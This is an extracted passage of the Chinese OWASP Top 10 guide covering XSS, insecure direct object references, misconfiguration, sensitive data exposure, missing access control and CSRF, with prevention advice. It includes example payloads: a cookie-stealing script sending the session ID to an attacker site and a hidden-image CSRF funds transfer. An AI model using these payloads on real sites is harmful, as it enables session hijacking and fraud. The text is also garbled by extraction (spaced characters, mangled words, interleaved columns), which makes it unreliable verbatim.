9 A3 跨 站 脚 本 (XSS) 攻 击 向 量 安 全 漏 洞 技 术 应 用 描 述 平 均 非 常 广 泛 易 任 何 能 够 发 送 不 可 攻 击 者 利 用 浏 览 器 XSS 是 最 普 遍 的 web 应 用 安 全 漏 洞 当 应 信 数 据 到 系 统 的 人, 中 的 解 释 器 发 送 基 用 程 序 发 送 给 浏 览 器 的 页 面 中 包 含 用 户 包 括 外 部 用 户 内 于 文 本 的 攻 击 脚 本 提 供 的 数 据, 而 这 些 数 据 没 有 经 过 适 当 部 用 户 和 管 理 员 几 乎 所 有 数 据 源 都 能 成 为 攻 击 媒 介, 包 括 内 部 数 据 源 比 如 数 据 库 中 的 数 据 的 验 证 或 转 义 (escape), 就 会 导 致 跨 站 脚 本 漏 洞 有 三 种 已 知 的 跨 站 漏 洞 类 型 :1) 存 储 式 ;2) 反 射 式 ;3) 基 于 DOM 的 XSS 大 部 分 跨 站 脚 本 漏 洞 通 过 测 试 或 代 码 分 析 很 容 易 找 到 中 等 攻 击 者 能 在 受 害 者 的 浏 览 器 中 执 行 脚 本 以 劫 持 用 户 会 话 破 坏 网 站 插 入 恶 意 内 容 重 定 向 用 户 使 用 恶 意 软 件 劫 持 用 户 浏 览 器 等 等 应 用 / 描 述 考 虑 受 的 系 统 及 该 系 统 处 理 的 所 有 数 据 的 商 业 价 值 还 应 该 考 虑 漏 洞 公 开 后 对 的 不 利 我 存 在 XSS 漏 洞 吗? 如 果 您 不 能 确 保 发 送 给 浏 览 器 的 所 有 用 户 提 供 的 输 入 都 经 过 了 恰 当 的 转 义 (escape), 或 者 在 这 些 内 容 被 显 示 在 页 面 之 前 您 没 有 验 证 它 们 通 过 输 入 验 证 都 是 安 全 的 输 出 内 容 没 有 经 过 恰 当 的 转 义 或 验 证, 导 致 输 入 被 视 为 浏 览 器 中 的 动 态 内 容 如 果 使 用 AJAX 动 态 地 更 新 页 面 内 容, 您 是 否 使 用 了 JavaScript 中 的 安 全 API? 不 安 全 的 JavaScript API 编 码 或 验 证 同 样 可 能 被 利 用, 导 致 XSS 漏 洞 自 动 化 工 具 能 够 自 动 找 到 一 些 跨 站 脚 本 漏 洞 然 而, 每 一 个 应 用 程 序 使 用 不 同 的 方 式 生 成 输 出 页 面, 并 且 使 用 不 同 的 浏 览 器 端 解 释 器, 例 如 JavaScript, AcPveX, Flash, 和 Silverlight, 这 使 得 自 动 检 测 变 得 很 困 难 因 此, 要 想 达 到 全 面 覆 盖, 必 须 使 用 一 种 结 合 的 方 式, 在 自 动 检 测 的 基 础 上, 同 时 采 用 人 工 代 码 审 核 和 手 动 渗 透 测 试 类 似 AJAX 的 web2.0 技 术 使 得 跨 站 脚 本 漏 洞 更 难 通 过 自 动 工 具 检 测 到 攻 击 案 例 应 用 程 序 在 下 面 HTML 代 码 段 的 构 造 中 使 用 未 经 验 证 或 转 义 的 不 可 信 的 数 据 : (String) page += "<input name='creditcard' type='text value='" + request.getparameter("cc") + "'>"; 攻 击 者 在 浏 览 器 中 修 改 CC 参 数 为 如 下 值 : '><script>document.locakon= 'h\p:// bin/cookie.cgi? foo='+document.cookie</script>'. 这 导 致 受 害 者 的 会 话 ID 被 发 送 到 攻 击 者 的 网 站, 使 得 攻 击 者 能 够 劫 持 用 户 当 前 会 话 请 注 意 攻 击 者 同 样 能 使 用 跨 站 脚 本 攻 破 应 用 程 序 可 能 使 用 的 任 何 跨 站 请 求 伪 造 (CSRF) 防 御 机 制 CSRF 的 详 细 情 况 见 A8 我 如 何 防 止 XSS? 防 止 XSS 需 要 将 不 可 信 数 据 与 动 态 的 浏 览 器 内 容 区 分 开 1. 最 好 的 办 法 是 根 据 数 据 将 要 置 于 的 HTML 上 下 文 ( 包 括 主 体 属 性 JavaScript CSS 或 URL) 对 所 有 的 不 可 信 数 据 进 行 恰 当 的 转 义 (escape) 更 多 关 于 数 据 转 义 技 术 的 信 息 见 OWASP XSS PrevenPon Cheat Sheet 2. 使 用 正 面 的 或 白 名 单 的, 具 有 恰 当 的 规 范 化 和 解 码 功 能 的 输 入 验 证 方 法 同 样 会 有 助 于 防 止 跨 站 脚 本 但 由 于 很 多 应 用 程 序 在 输 入 中 需 要 特 殊 字 符, 这 一 方 法 不 是 完 整 的 防 护 方 法 这 种 验 证 方 法 需 要 尽 可 能 地 解 码 任 何 编 码 输 入, 同 时 在 接 受 输 入 之 前 需 要 充 分 验 证 数 据 的 长 度 字 符 格 式 和 任 何 商 务 规 则 3. 更 多 内 容 请 参 考 OWASP 的 AnPSamy 或 Java HTML SaniPzer 项 目 4. 考 虑 使 用 内 容 安 全 策 略 (CSP) 来 抵 御 整 个 网 站 的 跨 站 脚 本 攻 击 参 考 资 料 OWASP OWASP XSS PrevenPon Cheat Sheet OWASP DOM based XSS PrevenPon Cheat Sheet OWASP Cross- Site ScripPng ArPcle ESAPI Encoder API ASVS: Output Encoding/Escaping Requirements (V6) OWASP AnPSamy: SaniPzaPon Library TesPng Guide: 1st 3 Chapters on Data ValidaPon TesPng OWASP Code Review Guide: Chapter on XSS Review OWASP XSS Filter Evasion Cheat Sheet 其 他 CWE Entry 79 on Cross- Site ScripPng

10 A4 不 安 全 的 直 接 对 象 引 用 攻 击 向 量 安 全 漏 洞 技 术 应 用 描 述 考 虑 系 统 的 用 户 类 型 对 于 某 些 系 统 数 据 类 型, 是 否 有 的 用 户 只 具 有 部 分 访 问 权 限? 易 作 为 授 权 的 系 统 用 户, 攻 击 者 只 需 要 修 改 指 向 一 个 系 统 对 象 的 直 接 引 用 参 数 值, 让 其 指 向 另 一 个 无 权 访 问 的 对 象 系 统 是 否 会 允 许 这 样 的 访 问? 常 见 易 当 生 成 web 页 面 时, 应 用 程 序 经 常 使 用 对 象 的 实 名 或 关 键 字 而 应 用 程 序 并 不 会 每 次 都 验 证 用 户 是 否 有 权 访 问 该 目 标 对 象, 这 就 导 致 了 不 安 全 的 直 接 对 象 引 用 漏 洞 测 试 者 能 轻 易 操 作 参 数 值 以 检 测 该 漏 洞 代 码 分 析 能 很 快 显 示 应 用 程 序 是 否 进 行 了 适 当 的 权 限 验 证 中 等 这 种 漏 洞 能 破 坏 通 过 该 参 数 引 用 的 所 有 数 据 除 非 对 象 引 用 是 不 可 预 知 的, 否 则 攻 击 者 很 容 易 访 问 该 类 型 的 所 有 数 据 应 用 / 描 述 考 虑 暴 露 的 数 据 的 商 业 价 值 还 应 该 考 虑 漏 洞 公 开 后 对 的 不 利 我 存 在 漏 洞 吗? 检 测 一 个 应 用 程 序 是 否 存 在 不 安 全 直 接 对 象 引 用 漏 洞 的 最 好 办 法, 就 是 验 证 其 所 有 的 对 象 引 用 都 具 有 适 当 的 防 御 能 力 要 达 到 这 一 目 的, 可 以 考 虑 : 1. 对 于 被 保 护 的 资 源 的 直 接 引 用, 应 用 程 序 是 否 未 能 验 证 用 户 有 权 限 访 问 他 们 所 请 求 的 具 体 资 源? 2. 如 果 该 引 用 是 间 接 引 用, 那 么 应 用 程 序 是 否 未 能 保 证, 该 间 接 引 用 只 能 映 射 到 授 权 给 当 前 用 户 访 问 的 直 接 引 用 的 值 对 应 用 程 序 进 行 代 码 审 查 能 快 速 验 证 以 上 方 法 是 否 被 安 全 实 现 了 测 试 同 样 是 找 出 直 接 对 象 引 用 以 及 确 认 它 们 是 否 安 全 的 有 效 方 法 然 而, 自 动 化 工 具 通 常 无 法 检 测 到 这 些 漏 洞, 因 为 它 们 无 法 识 别 哪 些 需 要 保 护 哪 些 是 安 全 或 不 安 全 的 攻 击 案 例 应 用 程 序 在 访 问 帐 户 信 息 的 SQL 调 用 中 使 用 未 验 证 数 据 : String query = "SELECT * FROM accts WHERE account =?"; PreparedStatement pstmt = conneckon.preparestatement(query, ); pstmt.setstring(1, request.getparameter("acct")); ResultSet results = pstmt.executequery(); 攻 击 者 能 轻 易 在 浏 览 器 将 acct 参 数 修 改 成 他 所 想 要 的 任 何 账 户 号 码 如 果 应 用 程 序 没 有 进 行 恰 当 的 验 证, 攻 击 者 就 能 访 问 任 何 用 户 的 账 户, 而 不 仅 仅 是 该 目 标 用 户 的 账 户 h\p://example.com/app/accountinfo?acct=notmyacct 我 如 何 防 止? 要 防 止 不 安 全 的 直 接 对 象 引 用, 需 要 选 择 一 个 适 当 的 方 法 来 保 护 每 一 个 用 户 可 访 问 的 对 象 ( 如 对 象 号 码 文 件 名 ): 1. 使 用 基 于 用 户 或 者 会 话 的 间 接 对 象 引 用 这 样 能 防 止 攻 击 者 直 接 攻 击 未 授 权 资 源 例 如, 一 个 下 拉 列 表 包 含 6 个 授 权 给 当 前 用 户 的 资 源, 它 可 以 使 用 数 字 1-6 来 指 示 哪 个 是 用 户 选 择 的 值, 而 不 是 使 用 资 源 的 数 据 库 关 键 字 来 表 示 在 服 务 器 端, 应 用 程 序 需 要 将 每 个 用 户 的 间 接 引 用 映 射 到 实 际 的 数 据 库 关 键 字 OWASP 的 ESAPI 包 含 了 两 种 序 列 和 随 机 访 问 引 用 映 射, 开 发 人 员 可 以 用 来 消 除 直 接 对 象 引 用 2. 检 查 访 问 任 何 来 自 不 可 信 源 的 直 接 对 象 引 用 都 必 须 通 过 访 问 控 制 检 测, 确 保 该 用 户 对 请 求 的 对 象 有 访 问 权 限 参 考 资 料 OWASP OWASP Top on Insecure Dir Object References ESAPI Access Reference Map API ESAPI Access Control API (See isauthorizedfordata(), isauthorizedforfile(), isauthorizedforfunckon()) 更 多 的 访 问 控 制 需 求, 请 见 ASVS requirements area for Access Control (V4) 其 他 CWE Entry 639 on Insecure Direct Object References CWE Entry 22 on Path Traversal ( 一 个 直 接 对 象 引 用 攻 击 的 例 子 )

11 A5 安 全 配 置 错 误 攻 击 向 量 安 全 漏 洞 技 术 应 用 描 述 考 虑 外 部 的 匿 名 攻 击 者 和 拥 有 自 己 帐 户 的 内 部 用 户 都 可 能 会 试 图 破 坏 系 统 的 另 外 考 虑 想 要 掩 饰 他 们 的 攻 击 行 为 的 内 部 攻 击 者 易 常 见 易 攻 击 者 访 问 默 认 帐 安 全 配 置 错 误 可 以 发 生 在 一 个 应 用 程 序 户 未 使 用 的 网 页 堆 栈 的 任 何 层 面, 包 括 平 台 Web 服 务 未 安 装 补 丁 的 漏 洞 器 应 用 服 务 器 数 据 库 框 架 和 自 定 未 被 保 护 的 文 件 和 义 代 码 开 发 人 员 和 系 统 管 理 员 需 共 同 目 录 等, 以 获 得 对 努 力, 以 确 保 整 个 堆 栈 的 正 确 配 置 自 系 统 未 授 权 的 访 问 动 扫 描 器 可 用 于 检 测 未 安 装 的 补 丁 错 或 了 解 误 的 配 置 默 认 帐 户 的 使 用 不 必 要 的 服 务 等 中 等 这 些 漏 洞 使 攻 击 者 能 经 常 访 问 一 些 未 授 权 的 系 统 数 据 或 功 能 有 时, 这 些 漏 洞 导 致 系 统 的 完 全 攻 破 应 用 / 描 述 系 统 可 能 在 你 未 知 的 情 况 下 被 完 全 攻 破 你 的 数 据 可 能 会 随 着 时 间 推 移 被 全 部 盗 走 或 者 篡 改 恢 复 的 花 费 可 能 会 很 昂 贵 我 易 受 攻 击 吗? 您 的 应 用 程 序 是 否 对 整 个 程 序 堆 栈 实 施 了 恰 当 的 安 全 加 固 措 施? 这 些 措 施 包 括 : 1. 是 否 有 软 件 没 有 被 及 时 更 新? 这 包 括 操 作 系 统 Web/ 应 用 服 务 器 数 据 库 管 理 系 统 应 用 程 序 和 其 它 所 有 的 代 码 库 文 件 ( 详 见 A9) 2. 是 否 使 用 或 安 装 了 不 必 要 的 功 能 ( 例 如, 端 口 服 务 网 页 帐 户 权 限 )? 3. 默 认 帐 户 的 密 码 是 否 仍 然 可 用 或 没 有 更 改? 4. 你 的 错 误 处 理 设 置 是 否 防 止 堆 栈 跟 踪 和 其 他 含 有 大 量 信 息 的 错 误 消 息 被 泄 露? 5. 你 的 开 发 框 架 ( 比 如 :Struts Spring ASP.NET) 和 库 文 件 中 的 安 全 设 置 是 否 理 解 正 确 并 配 置 恰 当? 缺 少 一 个 协 定 的 可 重 复 的 应 用 程 序 安 全 配 置 的 过 程, 系 统 将 处 于 高 风 险 中 攻 击 案 例 案 例 #1: 应 用 程 序 服 务 器 管 理 员 控 制 台 自 动 安 装 后 没 有 被 删 除 而 默 认 帐 户 也 没 有 被 改 变 攻 击 者 在 你 的 服 务 器 上 发 现 了 标 准 的 管 理 员 页 面, 通 过 默 认 密 码 登 录, 从 而 接 管 了 你 的 服 务 器 案 例 #2: 目 录 列 表 在 你 的 服 务 器 上 未 被 禁 用 攻 击 者 发 现 只 需 列 出 目 录, 她 就 可 以 找 到 你 服 务 器 上 的 任 意 文 件 攻 击 者 找 到 并 下 载 所 有 已 编 译 的 Java 类, 她 通 过 反 编 译 获 得 了 所 有 你 的 自 定 义 代 码 然 后, 她 在 你 的 应 用 程 序 中 找 到 一 个 访 问 控 制 的 严 重 漏 洞 案 例 #3: 应 用 服 务 器 配 置 允 许 堆 栈 跟 踪 返 回 给 用 户, 这 样 就 暴 露 了 潜 在 的 漏 洞 攻 击 者 热 衷 于 收 集 错 误 消 息 里 提 供 的 额 外 信 息 案 例 #4: 应 用 服 务 器 自 带 的 示 例 应 用 程 序 没 有 从 您 的 生 产 服 务 器 中 删 除 该 示 例 应 用 有 已 知 安 全 漏 洞, 攻 击 者 可 以 利 用 这 些 漏 洞 破 坏 您 的 服 务 器 我 如 何 防 止? 主 要 的 建 议 建 立 在 以 下 几 个 方 面 : 1. 一 个 可 以 快 速 且 易 于 部 署 在 另 一 个 锁 定 环 境 的 可 重 复 的 加 固 过 程 开 发 质 量 保 证 和 生 产 环 境 都 应 该 配 置 相 同 ( 每 个 环 境 中 使 用 不 同 的 密 码 ) 这 个 过 程 应 该 是 自 动 化 的, 以 尽 量 减 少 安 装 一 个 新 安 全 环 境 的 耗 费 2. 一 个 能 及 时 了 解 并 部 署 每 个 已 部 署 环 境 的 所 有 最 新 软 件 更 新 和 补 丁 的 过 程 这 需 要 包 括 通 常 被 忽 略 的 所 有 代 码 的 库 文 件 ( 详 见 新 的 A9 ) 3. 一 个 能 在 组 件 之 间 提 供 有 效 的 分 离 和 安 全 性 的 强 大 应 用 程 序 架 构 4. 实 施 漏 洞 扫 描 和 经 常 进 行 审 计 以 帮 助 检 测 将 来 可 能 的 错 误 配 置 或 没 有 安 装 的 补 丁 参 考 资 料 OWASP OWASP Development Guide: Chapter on ConfiguraPon OWASP Code Review Guide: Chapter on Error Handling OWASP TesPng Guide: ConfiguraPon Management OWASP TesPng Guide: TesPng for Error Codes OWASP Top Insecure ConfiguraPon Management 为 了 更 详 尽 的 了 解 该 领 域 的 需 求 信 息, 请 参 见 ASVS requirements area for Security ConfiguraPon (V12) 其 他 PC Magazine ArPcle on Web Server Hardening CWE Entry 2 on Environmental Security Flaws CIS Security ConfiguraPon Guides/Benchmarks

12 A6 敏 感 信 息 泄 漏 攻 击 向 量 安 全 漏 洞 技 术 应 用 描 述 考 虑 谁 可 以 访 问 您 的 敏 感 数 据 和 这 些 数 据 的 备 份 这 包 括 静 态 数 据 传 输 中 的 数 据 甚 至 是 客 户 浏 览 器 中 的 数 据 难 攻 击 者 通 常 不 直 接 攻 击 加 密 系 统 他 们 往 往 通 过 诸 如 窃 取 密 钥 发 起 中 间 人 攻 击 或 从 服 务 器 窃 取 明 文 数 据 等 方 式 对 传 输 中 的 或 者 客 户 浏 览 器 中 的 数 据 进 行 破 解 少 见 平 均 严 重 在 这 个 领 域 最 常 见 的 漏 洞 是 应 该 加 密 的 这 个 领 域 的 错 误 频 数 据 不 进 行 加 密 在 使 用 加 密 的 情 况 下, 繁 那 些 本 应 该 常 见 的 问 题 是 不 安 全 的 密 钥 生 成 和 管 理 加 密 的 数 据 这 些 和 使 用 弱 算 法 是 很 普 遍 的, 特 别 是 使 用 信 息 通 常 包 括 很 多 弱 的 哈 希 算 法 来 保 护 密 码 浏 览 器 的 漏 敏 感 数 据, 比 如 医 洞 也 很 普 遍, 且 可 以 很 轻 易 的 检 测 到, 疗 记 录, 认 证 凭 证, 但 是 很 难 大 规 模 的 利 用 外 部 攻 击 者 因 个 人 隐 私 数 据, 信 访 问 的 局 限 性 很 难 探 测 这 种 漏 洞, 并 且 用 卡 信 息, 等 等 难 以 利 用 应 用 / 描 述 考 虑 丢 失 数 据 和 声 誉 造 成 的 商 业 损 失 如 果 这 些 数 据 被 泄 露, 那 你 要 承 担 的 法 律 责 任 是 什 么? 另 外 考 虑 到 对 企 业 造 成 的 声 誉 我 易 受 攻 击 吗? 首 先 你 需 要 确 认 的 是 哪 些 数 据 是 敏 感 数 据 而 需 要 被 加 密 例 如 : 密 码 信 用 卡 医 疗 记 录 个 人 信 息 应 该 被 加 密 对 于 这 些 数 据, 要 确 保 : 1. 当 这 些 数 据 被 长 期 存 储 的 时 候, 无 论 存 储 在 哪 里, 它 们 是 否 都 被 加 密, 特 别 是 对 这 些 数 据 的 备 份? 2. 无 论 内 部 数 据 还 是 外 部 数 据, 传 输 时 是 否 是 明 文 传 输? 在 互 联 网 中 传 输 明 文 数 据 是 非 常 危 险 的 3. 是 否 还 在 使 用 任 何 旧 的 或 脆 弱 的 加 密 算 法? 4. 加 密 密 钥 的 生 成 是 否 是 脆 弱 的, 或 者 缺 少 恰 当 的 密 钥 管 理 或 缺 少 密 钥 回 转? 5. 当 浏 览 器 接 收 或 发 送 敏 感 数 据 时, 是 否 有 浏 览 器 安 全 指 令 或 头 文 件 丢 失? 还 有 更 多 关 于 在 这 一 领 域 应 该 避 免 的 更 多 问 题 请 参 见 ASVS areas Crypto (V7), Data Prot.(V9) 和 SSL(V10) 攻 击 案 例 案 例 #1: 一 个 应 用 程 序 加 密 存 储 在 数 据 库 的 信 用 卡 信 息, 以 防 止 信 用 卡 信 息 暴 露 给 最 终 用 户 但 是, 数 据 库 设 置 为 对 信 用 卡 表 列 的 查 询 进 行 自 动 解 密, 这 就 使 得 SQL 注 入 漏 洞 能 够 获 得 所 有 信 用 卡 信 息 的 明 文 该 系 统 应 该 被 设 置 为 前 端 应 用 程 序 使 用 公 钥 对 信 用 卡 信 息 加 密, 后 端 应 用 程 序 只 能 使 用 私 钥 解 密 案 例 #2: 一 个 网 站 上 所 有 需 要 身 份 验 证 的 网 页 都 没 有 使 用 SSL 攻 击 者 只 需 监 控 网 络 数 据 流 ( 比 如 一 个 开 放 的 无 线 网 络 或 其 社 区 的 有 线 网 络 ), 并 窃 取 一 个 已 验 证 的 受 害 者 的 会 话 cookie 然 后, 攻 击 者 利 用 这 个 cookie 执 行 重 放 攻 击 并 接 管 用 户 的 会 话 从 而 访 问 用 户 的 隐 私 数 据 案 例 #3: 密 码 数 据 库 使 用 unsalted 的 哈 希 算 法 去 存 储 每 个 人 的 密 码 一 个 文 件 上 传 漏 洞 使 黑 客 能 够 获 取 密 码 文 件 所 有 这 些 unsalted 哈 希 的 密 码 通 过 彩 虹 表 暴 力 破 解 方 式 破 解 我 如 何 防 止? 有 关 使 用 不 安 全 的 加 密 算 法 SSL 使 用 和 数 据 保 护 的 风 险 超 出 了 Top 10 的 范 围 尽 管 如 此, 对 一 些 需 要 加 密 的 敏 感 数 据, 应 该 起 码 做 到 以 下 几 点 : 1. 预 测 一 些 威 胁 ( 比 如 内 部 攻 击 和 外 部 用 户 ), 加 密 这 些 数 据 的 存 储 以 确 保 免 受 这 些 威 胁 2. 对 于 没 必 要 存 放 的 重 要 的 敏 感 数 据, 应 当 尽 快 清 除 3. 确 保 使 用 了 合 适 的 强 大 的 标 准 算 法 和 强 大 的 密 匙, 并 且 密 匙 管 理 到 位 可 参 考 FIPS 140 validated cryptographic modules 4. 确 保 使 用 密 码 专 用 算 法 存 储 密 码, 如 :bcrypt PBKDF2 或 者 scrypt 5. 禁 用 自 动 完 成 防 止 敏 感 数 据 收 集, 禁 用 包 含 敏 感 数 据 的 缓 存 页 面 参 考 资 料 OWASP 为 了 更 详 尽 的 了 解 该 领 域 的 相 关 需 求 和 因 避 免 的 相 关 问 题, 请 参 见 ASVS req ts on Cryptography (V7), Data ProtecPon (V9) 和 CommunicaPons Security (V10) OWASP Cryptographic Storage Cheat Sheet OWASP Password Storage Cheat Sheet OWASP Transport Layer ProtecPon Cheat Sheet OWASP TesPng Guide: Chapter on SSL/TLS TesPng 其 他 CWE Entry 310 on Cryptographic Issues CWE Entry 312 on Cleartext Storage of SensiPve InformaPon CWE Entry 319 on Cleartext Transmission of SensiPve InformaPon CWE Entry 326 on Weak EncrypPon

13 A7 功 能 级 访 问 控 制 缺 失 攻 击 向 量 安 全 漏 洞 技 术 应 用 描 述 易 常 见 平 均 中 等 应 用 / 描 述 任 何 人 具 有 网 络 访 问 权 限 的 人 都 可 以 向 你 的 应 用 程 序 发 送 一 个 请 求 匿 名 用 户 可 以 访 问 私 人 网 页 吗? 又 或 者 普 通 用 户 可 以 访 问 享 有 特 权 的 网 页 吗? 攻 击 者 是 被 授 权 的 系 统 用 户, 很 容 易 就 把 网 址 更 改 成 享 有 特 权 的 网 页 这 样 的 访 问 会 被 允 许 吗? 匿 名 用 户 可 以 访 问 未 受 保 护 的 私 人 网 页 应 用 程 序 并 不 总 是 能 正 确 地 保 护 页 面 请 求 有 时 功 能 级 的 防 护 是 通 过 配 置 来 管 理 的, 而 系 统 的 配 置 是 错 误 的 开 发 人 员 必 须 要 做 相 应 的 代 码 检 查, 然 而, 有 时 他 们 忘 记 了 检 测 这 些 漏 洞 是 很 容 易 的 最 难 的 是 确 定 应 用 程 序 存 在 哪 些 可 被 攻 击 的 网 页 或 者 链 接 (URL) 这 种 漏 洞 允 许 攻 击 者 访 问 未 经 授 权 的 功 能 管 理 性 的 功 能 是 这 类 攻 击 的 主 要 目 标 考 虑 被 暴 露 的 功 能 及 其 处 理 的 数 据 的 商 业 价 值 另 外 考 虑 如 果 这 样 的 弱 点 被 公 布 于 众 而 对 你 造 成 的 名 誉 我 是 否 存 在 强 制 访 问 漏 洞? 检 查 应 用 程 序 是 否 正 确 的 限 制 了 功 能 级 的 访 问 的 最 好 方 法 是 验 证 每 一 个 应 用 程 序 的 功 能 1. 用 户 界 面 (UI) 是 否 存 在 到 未 授 权 功 能 的 导 航? 2. 服 务 器 端 的 身 份 认 证 或 授 权 功 能 是 否 完 善? 3. 服 务 器 端 的 检 查 是 否 仅 仅 依 赖 于 攻 击 者 提 供 的 信 息? 开 启 代 理 的 情 况 下, 先 以 特 权 用 户 身 份 浏 览 一 遍 您 的 功 能, 然 后 以 普 通 用 户 身 份 再 次 访 问 受 限 页 面 如 果 服 务 器 的 响 应 很 类 似, 您 的 应 用 很 可 能 容 易 受 攻 击 一 些 测 试 代 理 直 接 支 持 此 种 类 型 的 分 析 您 也 可 以 检 查 代 码 中 的 访 问 控 制 的 实 现 试 着 以 一 个 单 一 的 特 权 请 求 贯 穿 代 码 并 验 证 授 权 模 式 然 后 搜 索 代 码 库 中 没 有 遵 循 该 模 式 的 地 方 自 动 化 工 具 不 太 可 能 发 现 这 些 问 题 攻 击 案 例 案 例 1#: 攻 击 者 仅 仅 直 接 浏 览 目 标 网 址 例 如 下 面 的 两 个 网 址 都 需 要 身 份 验 证 同 时 访 问 admin_getappinfo 页 面 还 需 要 管 理 员 权 限 h\p://example.com/app/getappinfo h\p://example.com/app/admin_getappinfo 如 果 未 认 证 的 用 户 可 以 访 问 上 述 任 一 页 面, 这 就 是 漏 洞 如 果 通 过 验 证 的 非 管 理 员 用 户 也 能 允 许 访 问 admin_getappinfo 页 面, 这 同 样 是 个 漏 洞 这 个 漏 洞 可 能 会 将 攻 击 者 引 向 更 多 保 护 不 当 的 管 理 页 面 案 例 2#: 一 个 页 面 提 供 了 acpon 参 数 给 某 个 特 定 的 功 能 调 用, 并 且 不 同 的 操 作 需 要 不 同 的 角 色 如 果 没 有 进 行 角 色 检 查, 这 也 是 漏 洞 我 如 何 防 止? 您 的 应 用 程 序 应 该 使 用 一 致 的 和 易 于 分 析 的 授 权 模 块, 并 能 在 所 有 的 功 能 中 调 用 该 模 块 通 常 是, 由 一 个 或 多 个 外 部 组 件 向 应 用 代 码 内 部 提 供 这 种 保 护 1. 考 虑 一 下 管 理 权 利 的 过 程 并 确 保 能 够 容 易 的 进 行 升 级 和 审 计 切 忌 硬 编 码 2. 执 行 机 制 在 缺 省 情 况 下, 应 该 拒 绝 所 有 访 问 对 于 每 个 功 能 的 访 问, 需 要 明 确 授 予 特 定 角 色 的 访 问 权 限 3. 如 果 某 功 能 参 与 了 工 作 流 程, 检 查 并 确 保 当 前 的 条 件 是 授 权 访 问 此 功 能 的 合 适 状 态 注 意 : 多 数 web 应 用 并 不 显 示 未 授 权 功 能 的 链 接 和 按 钮, 可 是 这 种 展 现 层 访 问 控 制 实 际 上 并 不 提 供 防 护 您 必 须 还 要 实 现 控 制 或 逻 辑 层 面 的 检 查 参 考 资 料 OWASP OWASP Top on Failure to Restrict URL Access ESAPI Access Control API OWASP Development Guide: Chapter on AuthorizaPon OWASP TesPng Guide: TesPng for Path Traversal OWASP ArPcle on Forced Browsing 为 了 更 详 尽 的 了 解 访 问 控 制 的 需 求, 请 参 见 ASVS requirements area for Access Control (V4) 其 他 CWE Entry 285 on Improper Access Control (AuthorizaPon)

14 A8 跨 站 请 求 伪 造 (CSRF) 攻 击 向 量 安 全 漏 洞 技 术 应 用 描 述 考 虑 可 能 将 内 容 载 入 你 用 户 的 浏 览 器 并 迫 使 他 们 向 你 的 网 站 提 交 请 求 的 任 何 人 你 的 用 户 所 访 问 的 任 何 网 站 或 者 HTML 源 (feed) 都 可 以 这 样 做 平 均 攻 击 者 创 建 伪 造 HTTP 请 求 并 通 过 图 片 标 签 跨 站 脚 本 或 许 多 其 他 技 术 诱 使 受 害 用 户 提 交 这 些 请 求 如 果 该 受 害 用 户 已 经 经 过 身 份 认 证, 那 么 攻 击 就 能 成 功 常 见 易 CSRF 是 利 用 某 些 web 应 用 程 序 允 许 攻 击 者 预 测 一 个 特 定 操 作 的 所 有 细 节 这 一 特 点 由 于 浏 览 器 自 动 发 送 会 话 cookie 等 认 证 凭 证, 攻 击 者 能 创 建 恶 意 web 页 面 产 生 伪 造 请 求 这 些 伪 造 请 求 很 难 与 合 法 请 求 区 分 开 跨 站 请 求 伪 造 漏 洞 可 以 很 容 易 通 过 渗 透 测 试 或 代 码 分 析 检 测 到 中 等 攻 击 者 能 欺 骗 受 害 用 户 完 成 该 受 害 者 所 允 许 的 任 意 状 态 改 变 的 操 作, 比 如 : 更 新 帐 号 细 节, 完 成 购 物, 注 销 甚 至 登 录 等 操 作 应 用 / 描 述 考 虑 受 的 数 据 和 应 用 功 能 的 商 业 价 值 试 想 如 果 并 不 知 道 这 些 操 作 是 否 是 用 户 的 真 正 意 愿 会 产 生 什 么 后 果 同 时 考 虑 带 来 的 声 誉 我 存 在 CSRF 漏 洞? 检 测 应 用 程 序 是 否 存 在 该 漏 洞 的 方 法 是 查 看 是 否 每 个 链 接 和 表 单 都 提 供 了 不 可 预 测 的 CSRF 令 牌 没 有 这 样 的 令 牌, 攻 击 者 就 能 够 伪 造 恶 意 请 求 另 一 种 防 御 的 方 法 是 要 求 用 户 证 明 他 们 要 提 交 请 求, 可 以 通 过 重 新 认 证 的 方 式 或 者 其 他 能 够 证 明 他 们 是 真 实 用 户 的 方 法 ( 比 如 :CAPTCHA) 重 点 关 注 那 些 调 用 能 够 改 变 状 态 功 能 的 链 接 和 表 格, 因 为 他 们 是 跨 站 请 求 伪 造 攻 击 的 最 重 要 的 目 标 由 于 多 步 交 易 并 不 具 备 内 在 的 防 攻 击 能 力, 因 此 我 们 需 要 检 测 这 些 交 易 攻 击 者 能 轻 易 使 用 多 个 标 签 或 JavaScript 伪 造 一 系 列 请 求 请 注 意 : 会 话 cookie 源 IP 地 址 和 其 他 浏 览 器 自 动 发 送 的 信 息 不 能 作 为 防 攻 击 令 牌, 因 为 这 些 信 息 已 经 包 含 在 伪 造 的 请 求 中 OWASP 的 CSRF 测 试 工 具 有 助 于 生 成 测 试 案 例, 可 用 于 展 示 跨 站 请 求 伪 造 漏 洞 的 危 害 攻 击 案 例 应 用 程 序 允 许 用 户 提 交 不 包 含 任 何 保 密 字 段 的 状 态 改 变 请 求, 如 : h\p://example.com/app/transferfunds?amount=1500 &desknakonaccount= 因 此, 攻 击 者 构 建 一 个 请 求, 用 于 将 受 害 用 户 账 户 中 的 现 金 转 移 到 自 己 账 户 然 后 攻 击 者 在 其 控 制 的 多 个 网 站 的 图 片 请 求 或 iframe 中 嵌 入 这 种 攻 击 <img src="h\p://example.com/app/transferfunds? amount=1500&desknakonaccount=a\ackersacct# width="0" height="0" /> 如 果 受 害 用 户 通 过 example.com 认 证 后 访 问 任 何 一 个 攻 击 者 的 网 站, 伪 造 的 请 求 将 自 动 包 含 用 户 的 会 话 信 息, 授 权 执 行 攻 击 者 的 请 求 我 如 何 防 止 CSRF? 防 止 跨 站 请 求 伪 造, 通 常 需 要 在 每 个 HTTP 请 求 中 添 加 一 个 不 可 预 测 的 令 牌 这 种 令 牌 至 少 应 该 对 每 一 个 用 户 会 话 来 说 是 唯 一 的 1. 最 好 的 方 法 是 将 独 有 的 令 牌 包 含 在 一 个 隐 藏 字 段 中 这 将 使 得 该 令 牌 通 过 HTTP 请 求 体 发 送, 避 免 其 包 含 在 URL 中 从 而 被 暴 露 出 来 2. 该 独 有 令 牌 同 样 可 以 包 含 在 URL 中 或 作 为 一 个 URL 参 数 但 是 这 种 方 法 的 巨 大 风 险 在 于 :URL 会 暴 露 给 攻 击 者, 这 样 秘 密 令 牌 也 会 被 泄 漏 OWASP 的 CSRF Guard 可 以 用 来 在 Java EE,.NET, or PHP 应 用 程 序 中 自 动 加 入 这 种 令 牌 OWASP 的 ESAPI 包 含 了 多 种 开 发 